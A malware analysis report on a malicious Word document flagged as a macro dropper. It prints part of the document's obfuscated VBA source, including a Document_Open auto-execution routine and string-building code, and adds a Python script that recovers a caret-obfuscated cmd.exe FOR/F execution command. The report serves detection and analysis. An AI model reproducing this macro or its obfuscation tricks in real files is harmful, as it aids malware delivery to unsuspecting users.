Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 82d4b96ba145bc83…

MALICIOUS

Office (OLE)

Size: 177.8 KB
Created: 2018-07-17 22:13:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 60b4ddc6840e75fd6b32d0771c91c225
SHA-1: a71cf5a4d8c5754d7be317217a0d0043c8f7f96f
SHA-256: 82d4b96ba145bc835d1d2009d4301824ca14d1900a12f6003a32c2296f5dc775
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Word document whose VBA project contains a Document_Open auto-execution macro, and the project also contains a Shell() call (see Heuristics): code runs as soon as the document is opened with macros enabled, and it can launch arbitrary commands, the classic shape of a dropper that fetches and runs a second-stage payload. In the extracted source below, Document_open builds a command string from dozens of concatenated literals and CStr(Chr(...)) expressions and hands it to another routine through Application.Run("uCqKMmUvRpQDut", ...); that routine lies beyond the truncated preview, so the Shell() call flagged by the heuristics is presumably inside it. The visible fragments in waafif (f^Or, /^F, delims=, tokens=, ^^Ft^^YPE, ^|, ^^FinDstr, SHC, D^O, %^x) are consistent with a caret-obfuscated cmd.exe "for /F" loop that runs "ftype | findstr SHC" and executes the resulting token. The arithmetic on never-assigned variables, guarded by On Error Resume Next, is dead code padding that hinders signature matching and casual reading. The ClamAV detection Doc.Dropper.Agent-6615425-0 (the identifier reported under Heuristics) is consistent with the dropper role.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6615425-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6615425-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office files; it is not a download or C2 indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   29875 bytes
SHA-256: 99ee620906b3e4c2b72526289acefe9aefb744556ccc86c97a39dd26d08e87db

Preview: first 1,000 lines of the decoded VBA source (cut off below, before the routine named in Application.Run)
Attribute VB_Name = "EjzKQdfowBwasX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jwZwfjA()
   tsGwj = (58626 / VkpEh / JlcoVl / jNNEzT / jbOrr * 3830 * UiwRC * VijiU / uzOui - OVdji)
   QoXzKD = (11806 / tuhWd / ABiuI / ZiBXE / wirEBG * 89993 * JlTsvT * bUwWj / aYzwo - XPimAs)
   FZnRQ = (81310 / akDiBG / WNwjB / MhCHR / jhhdG * 97500 * izlXs * QObFOl / szUTYG - IzXXjA)
   bhptb = (53651 / OPiqzp / zNFBYh / FuHNP / UbwSz * 46111 * wtfDu * LLJOG / CpRUhz - qjVnh)
End Function
Function PntWwMffo()
   UphYzI = (60369 / NJzzjE / zWYFzp / CzPZc / OMnCZ * 20022 * EXqjYV * rwFBH / JMjjT - DPnhIY)
   XSkFCd = (67978 / aYQVhf / djdoEw / llhlN / HtPKLQ * 21634 * iQaCvR * rzSLq / jzBAw - CjwXRQ)
   kBVvZ = (42172 / ubfsj / PMDuOR / zBjDi / HdQqiI * 85477 * pqcJbl * OkArm / nCjnu - cXiVS)
   zPoJLs = (11430 / AjoJOv / dEYSj / sElBm / NKKCQM * 10478 * ZPubT * MtEPd / AXFHDA - cHLCHY)
   hJFJRU = (76018 / PClIiw / mOZWOY / NJNhIL / sImspo * 66472 * IuWikj * OpEEmM / suoDn - vvjMbT)
End Function
Private Sub Document_open()
On Error Resume Next
   OqwwH = 94517 / GcLXqi * QANSSm / WnNdD * OIpTf + 65638
   jRSfb = 32271 / hIaiq * ziUwGa / vwvvsN * FHtRtX + 93955
   cGfdq = 9951 / OJPWut * pYQZr / GUQJo * qNaDOZ + 26957
   lrIOB = 5799 / OBaMk * Frfpzo / uRbwZ * MMnzL + 73680
poEuprYaMjD = Application.Run("uCqKMmUvRpQDut", "" + JinwTpS + zWYcRjEiftrDj + CVar("c") + XOznrsI + LqiiUSjDFXj + waafif + crYwDLO + NSjNrTAszOr + UXBvWO + zwtLab + RFDrazhsVOK + wztwhTdzDH + SzWYS + DjCuhaj + rzqaRdIhW + FBPKDnZRR + AdoJbwiJIUS + bLBwq + zwpoXnHsNVX + AMHjRjHLcfQz + hluwPHqVo)
   sBKjzb = 32062 / rdTmp * tloiXY / cjYRPz * ItfJn + 35604
   cnFAw = 62145 / jDXDSH * aNEhJ / qpLWcf * pWuiY + 16725
End Sub
Function BKzZWTtJsbAcJq()
   PRuIma = 45094 / LUvws * tvSEZ / zmHbX * wdSLwL + 73245
   uhwYuq = 72698 / nPVZWa * lTTZok / PHviE * ELfXw + 59437
   pmjAt = 354 / EnuPjh * phwNK / cKSkwd * DAYkMj + 96921
   wCQRmO = 68982 / DKwzKz * GhrmU / wQIqO * nwkzC + 73706
   iDfNU = 66402 / hHJOY * dwwbPi / TwDPGZ * PKDzj + 1633
End Function


Attribute VB_Name = "rkoiVPAkzho"
Function waafif()
On Error Resume Next
PMLcF = (USBvKM + rmIqN + TijwKK - INmCc - YlZkJN / jpNzqC + 24557 * cNbVv)
   IXLhjd = QLcKil - 45709 / fcMXOl - LGpwUq * 5255 * JfwmNZ * 35528 + zkMJO
   qjOBR = (pHfwTb + TRCzcQ + iRlIHz - fAKhjz - utWHw / uhhzX + 52646 * uLKcs)
wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + "  ;" + " /^F  " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + "   " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F"
oHVOvn = (RmbkSS + YQfEz + VXEzj - khKwdj - Xjsuz / ZuJaGA + 62292 * ROOFG)
   YuFuUs = (GUQmc + ZXjsjK + wkmkjY - UpipB - QVzQN / NkaMil + 98550 * UnikLU)
dRDukrAhzjO = "H toke" + "ns=  " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + "  ," + "  %^" + "x ; " + " , In " + ", (  ;" + " " + ";"
BmHwjc = 90019 - tZizFL - 39500 + WjBjq * ubtHv / pwODA - 68400 - JqCTi
   RCVhM = 4880 - HnwDz - 90417 + fVfYX * MwwzA / TSvtW - 18992 - zPqZRU
hUMZwZ = " '" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + "  ^| " + " " + "; ^^" + "FinDst"
UnKmo = 90360 - CkTouq - 86380 + DYhnuz * fzWBK / UMSKI - 17769 - ojVGM
TwpanGGOGdw = "r  " + ",  ; " + " ^" + "^SHC " + " '"
aTEPf = 47205 - TbcLF - 69488 + CmzSfs * IzBcOX / FqYMGj - 5424 - cDMvz
   kMpTQK = 98386 - BkoFJI - 20989 + nkZiX * dmhTs / DabrD - 64501 - nhhtBV
fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " ,  " + "%" + "^x" + ",   ,"
rlwaPv = 88513 - tOKsc - 17590 + ukCcF * XInsnM / TCqPbS - 17521 - njiKqU
   rcKEi = 89442 - ipZrRW - 4318 + QBXNlE * zBjjJu / kuTIi - 19559 - ESDLup
vuPZnQlUUkw = " k2D" + "/V^4" + "^5" 
... (truncated)
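As an added example for this report (not part of the analysed sample, the report, or the tooling that produced it), the Python below evaluates the six string-building assignments visible in Function waafif() above and strips one layer of cmd.exe caret escaping to show the command they assemble. It assumes standard VBA semantics: a variable that is never assigned is Empty, which is 0 in arithmetic (so CStr(Chr(a + b + 109 + c + d)) is "m") and "" in concatenation. It also assumes the fragments are joined in assignment order, because the function's return statement lies beyond the truncated preview; the split of "FinDst" + "r" across two variables supports that assumption. The leading "c" of "cmd" comes from CVar("c") in Document_open and is not part of these fragments.

```python
"""Recover the cmd.exe command hidden in the waafif() string fragments.

Added example; not the sample's code and not an analysis-tool API.
Assumes VBA Empty-variable semantics (0 in arithmetic, "" in concatenation)
and that the fragments are concatenated in assignment order.
"""
import re

# The six assignments copied from Function waafif() in the preview above
# (the numeric junk lines between them are omitted).
WAAFIF_ASSIGNMENTS = [
    'wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + "  ;" + " /^F  " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + "   " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F"',
    'dRDukrAhzjO = "H toke" + "ns=  " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + "  ," + "  %^" + "x ; " + " , In " + ", (  ;" + " " + ";"',
    'hUMZwZ = " \'" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + "  ^| " + " " + "; ^^" + "FinDst"',
    'TwpanGGOGdw = "r  " + ",  ; " + " ^" + "^SHC " + " \'"',
    'fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " ,  " + "%" + "^x" + ",   ,"',
    'vuPZnQlUUkw = " k2D" + "/V^4" + "^5"',
]

# One token per match: a quoted literal, a CStr(Chr(<sum>)) call, or a bare
# identifier. Alternation order matters: CStr(Chr(...)) must win over \w+.
TOKEN_RE = re.compile(r'"([^"]*)"|CStr\(Chr\(([^()]*)\)\)|(\w+)')


def eval_vba_concat(rhs):
    """Evaluate a VBA '+'-concatenation of literals and CStr(Chr(sum)) calls.

    Never-assigned identifiers are Empty: 0 inside the Chr() sum, "" when
    appended directly. Only '+' appears in the sample, so '-' is not handled.
    """
    out = []
    for lit, chr_arg, ident in TOKEN_RE.findall(rhs):
        if chr_arg:
            terms = re.split(r"\s*\+\s*", chr_arg.strip())
            out.append(chr(sum(int(t) for t in terms if t.isdigit())))
        elif ident:
            continue  # bare Empty variable contributes nothing
        else:
            out.append(lit)
    return "".join(out)


def cmd_unescape(s):
    """Remove one layer of cmd.exe caret escaping: ^^ -> ^ and ^x -> x."""
    return re.sub(r"\^(.)", r"\1", s)


def recover_command(assignments):
    """Return (fragments by name, raw joined string, readable command)."""
    fragments = {}
    for line in assignments:
        name, rhs = line.split("=", 1)
        fragments[name.strip()] = eval_vba_concat(rhs)
    raw = "".join(fragments.values())          # assumption: assignment order
    one_pass = cmd_unescape(raw)               # outer cmd.exe parse
    # cmd.exe treats space, ',' and ';' as token separators outside quotes;
    # collapsing them exposes the FOR /F structure (quotes left untouched).
    readable = re.sub(r"[ ,;]+", " ", one_pass).strip()
    return fragments, raw, readable


if __name__ == "__main__":
    frags, raw, readable = recover_command(WAAFIF_ASSIGNMENTS)
    for name, value in frags.items():
        print(f"{name:12s} -> {value!r}")
    print("joined   :", raw)
    print("one pass :", readable)
    # The part between the single quotes is the FOR /F command, parsed again
    # by a second cmd.exe instance, which is why those carets are doubled.
    inner = readable.split("'")[1]
    print("inner    :", cmd_unescape(inner).strip())
```

Run stand-alone, the recovered outer command reads `md /c fOr /F " delims=T6FH tokens= +2 " %x In ( ' ^Ft^YPE | ^FinDstr ^SHC ' ) DO %x k2D/V45`, and a second pass over the quoted part yields `FtYPE | FinDstr SHC`. The same two-pass approach (evaluate Empty-aware VBA concatenation, then peel caret layers per cmd.exe parse) applies to the other fragment variables referenced in Document_open whose definitions fall outside the preview.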